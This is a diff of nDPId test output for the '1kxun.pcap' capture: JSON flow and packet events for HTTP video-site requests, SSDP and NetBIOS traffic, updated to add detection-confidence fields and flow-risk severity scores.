-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104379271,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMMsAAAER0qXAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104379271,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOp0AAAERyODAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"ts_msec":1470104379271,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1470104379271,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxsAAAER6ZTAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1470104379579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAEQAABAAEARs0nAqAVDwKj\/\/wCKAIoA\/P+KEQouQ8CoBUMAigDmAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAATAAAAAAAAAAAAAAAAAAAAAAAAABMAFYAAwABAAEAAgBdAFxNQUlMU0xPVFxCUk9XU0UAD1DgkwQAU0FOSkktTElGRUJPT0stTAQJA5qEAA8BVapzYW5qaS1MSUZFQk9PSy1MSDUzMSBzZXJ2ZXIgKFNhbWJhLCBVYnVudHUpAA=="}
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1470104379579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAD5AABAAEARs2DAqAVDwKj\/\/wCKAIoA5V88EQouRMCoBUMAigDPAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAANQAAAAAAAAAAAAAAAAAAAAAAAAA1AFYAAwABAAEAAgBGAFxNQUlMU0xPVFxCUk9XU0UADFDgkwQAV09SS0dST1VQAAAAAAAAAAQJABAAgA8BVapTQU5KSS1MSUZFQk9PSy1MSDUzMQA="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1470104379887,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"ts_msec":1470104379887,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiDQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACATQ="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -158,89 +158,89 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"}
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}}
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1470104380603,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104380603,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLUAAAQRv8HAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
